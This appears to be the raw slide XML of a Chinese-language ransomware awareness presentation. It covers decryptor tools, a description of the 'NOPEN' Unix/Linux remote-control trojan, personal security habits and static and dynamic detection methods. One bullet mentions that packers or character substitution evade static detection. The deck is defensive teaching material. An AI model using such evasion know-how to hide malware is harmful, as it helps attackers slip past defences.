              <a:tr h="640080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Rannoh Decryptor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>解密被Rannoh、AutoIt、Fury、Cryakl、Crybola、CryptXXX（V1、V2和V3）和Polyglot aka Marsjoke锁定的文件。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="640080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>CoinVault Decryptor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>解密被CoinVault和Bitcryptor锁定的文件。此解密器是卡巴斯基与荷兰警方的国家高科技罪案组（NHTCU）与荷兰国家检察机关合作开发的。</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10004"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="640080">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Xorist Decryptor</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr>
                        <a:buNone/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
                        <a:t>解密被Xorist和Vandev锁定的文件。</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883920" y="223520"/>
            <a:ext cx="10373360" cy="583565"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
            <a:scene3d>
              <a:camera prst="orthographicFront"/>
              <a:lightRig rig="threePt" dir="t"/>
            </a:scene3d>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ct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“NOPEN”远控木马</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="558800" y="1391285"/>
            <a:ext cx="10737215" cy="2861310"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>“NOPEN”木马工具为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>针对Unix/Linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>系统的远程控制工具；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>主要用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>文件窃取、系统提权、网络通信重定向以及查看目标设备信息</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>等，是TAO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>远程控制受害单位内部网络节点</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>的主要工具；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>编码</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>技术复杂、功能全面、隐蔽性强、适配多种处理器架构和操作系统</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>采用了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>插件式结构，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>可以与其他网络武器或攻击工具进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>交互和协作</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>；</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>是典型的用于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>网络间谍</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>活动的武器工具。</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550" y="732790"/>
            <a:ext cx="12038330" cy="6000750"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(一)养成良好的安全习惯</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>电脑应当安装具有云防护和主动防御功能的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>安全软件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>可使用安全软件的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>漏洞修复</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>功能，第一时间为操作系统和IE、Flash等常用软件打好补丁。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>尽量使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>安全浏览器</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，减少遭遇挂马攻击、钓鱼网站的风险。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>重要文档、数据应经常做</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>备份</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，一旦文件损坏或丢失，也可以及时找回。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>电脑设置的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>口令</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>要足够复杂，包括数字、大小写字母、符号且长度至少应该有8位。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>    (二)减少危险的上网操作</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>不要浏览来路不明的色情、赌博等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>不良信息网站</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，此类网站经常被用于发起</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>挂马、钓鱼攻击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>不要轻易打开陌生人发来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>邮件附件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>或邮件正文中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>网址链接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>。也不要轻易打开扩展名为js 、vbs、wsf、bat、cmd、ps1等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>脚本文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>和exe、scr等</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>可执行程序</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，对于陌生人发来的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:effectLst/>
              </a:rPr>
              <a:t>压缩文件包</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，更应提高警惕，先使用安全软件进行检查后再打开。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>电脑连接</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>移动存储设备</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>（如U盘、移动硬盘等），应首先使用安全软件检测其安全性。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>对于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>安全性不确定的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，可以选择在安全软件的沙箱功能中打开运行，从而避免木马对实际系统的破坏。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="221742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个人安全防护</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9420" y="2610485"/>
            <a:ext cx="10482580" cy="706755"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="4000" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>勒索病毒检测</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27656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="圆角矩形 5"/>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矩形 6"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="289560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恶意代码检测技术</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="左大括号 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1949450" y="2397760"/>
            <a:ext cx="207010" cy="1825625"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 49147"/>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4" name="圆角矩形 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2188210" y="2143760"/>
            <a:ext cx="3539490" cy="602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基于主机的检测方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="圆角矩形 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2156460" y="3811270"/>
            <a:ext cx="3539490" cy="602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基于网络的检测方法</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="左大括号 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5949950" y="1532255"/>
            <a:ext cx="207010" cy="1825625"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2" fmla="val 49147"/>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0" name="圆角矩形 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156960" y="1238250"/>
            <a:ext cx="2713355" cy="602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静态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="圆角矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6156960" y="3009265"/>
            <a:ext cx="2713355" cy="602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t>动态检测</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="图片 1"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8870315" y="925195"/>
            <a:ext cx="3321685" cy="5478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0"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8320" y="732790"/>
            <a:ext cx="9942195" cy="4892675"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>静态文件分析</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>是一种恶意软件分析方法，它主要查看可执行文件是否可疑，但并不实际运行代码。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>静态文件分析会查找</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>已知的恶意代码序列或可疑字符串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，比如经常被盯上的文件扩展名和勒索信中所用的常用词。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>分析工具会标记可执行文件中的可疑部分，可用于检查文件中的嵌入字符串、库、导入内容及其他攻陷指标（IOC）。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>不过此项检测手段需要</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>依赖于针对勒索软件构建的威胁情报体系</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，不断增扩展名、可疑字符串等。同时，此项手段需人工处置的比例较大，产品化可能较低。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" charset="0"/>
              <a:buChar char="l"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>使用打包器/加密器（Packer/Crypter）或只需</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>将字符换成数字或特殊字符</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
              <a:t>，即可轻松绕过。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="3" name="组合 2"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1927656" y="282"/>
            <a:ext cx="9648394" cy="781967"/>
            <a:chOff x="2543606" y="42192"/>
            <a:chExt cx="9648394" cy="781967"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="4" name="圆角矩形 3"/>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p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2831637" y="138202"/>
              <a:ext cx="153924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静态分析</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9440" y="782320"/>
